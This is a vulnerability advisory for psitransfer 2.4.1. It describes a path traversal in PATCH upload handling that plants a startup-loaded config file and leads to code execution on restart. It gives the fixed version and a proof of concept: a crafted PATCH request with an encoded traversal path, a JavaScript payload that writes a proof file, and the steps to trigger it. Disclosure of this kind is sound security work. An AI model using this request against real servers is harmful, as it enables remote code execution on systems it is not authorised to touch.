# Vulnerability Summary: Upload PATCH Path Traversal Can Create `config..js` and Lead to Code Execution on Restart ## Overview In version 2.4.1 of `psitransfer`, the upload middleware has a path traversal vulnerability when processing `PATCH` requests. An attacker can craft a malicious request and exploit logic flaws in `path.resolve` and `path.normalize` to create a `config..js` file in the application root directory. Since this file is automatically loaded and executed by Node.js upon application restart, it results in remote code execution (RCE). ## Impact Scope - **Affected Version**: 2.4.1 - **Fixed Version**: 2.4.3 - **CVSS Score**: 7.5 / 10 (High) - **Attack Vector**: Network - **Attack Complexity**: High - **Privileges Required**: None - **User Interaction**: Required - **Scope**: Unchanged - **Confidentiality**: High - **Integrity**: High - **Availability**: High ## Remediation Upgrade to version **2.4.3**. ## POC Code ```javascript // 1. Start PsiTransfer 2.4.1 from source with NODE_ENV=production and a supported custom upload directory whose basename prefixes a startup-loaded file path, for example: PSITRANSFER_UPLOAD_DIR=/tmp/psitransfer/conf. // 2. Send a PATCH request directly to the upload endpoint: PATCH /files/.%2Fconfig.production.js HTTP/1.1 Host: target User-Agent: 1.0.0 Upload-Offset: 0 Content-Type: application/octet-stream module.exports = {}; require('fs').writeFileSync('/tmp/psitransfer-rce-proof', 'owned'); // 3. Observe that the response is 404 Not Found, but /tmp/psitransfer/config.production.js is created and contains the attacker-controlled payload. // 4. Restart the PsiTransfer process, or wait for the next routine restart under the same NODE_ENV. // 5. Observe that /tmp/psitransfer-rce-proof is created during startup, confirming server-side JavaScript execution from the injected config.production.js. ```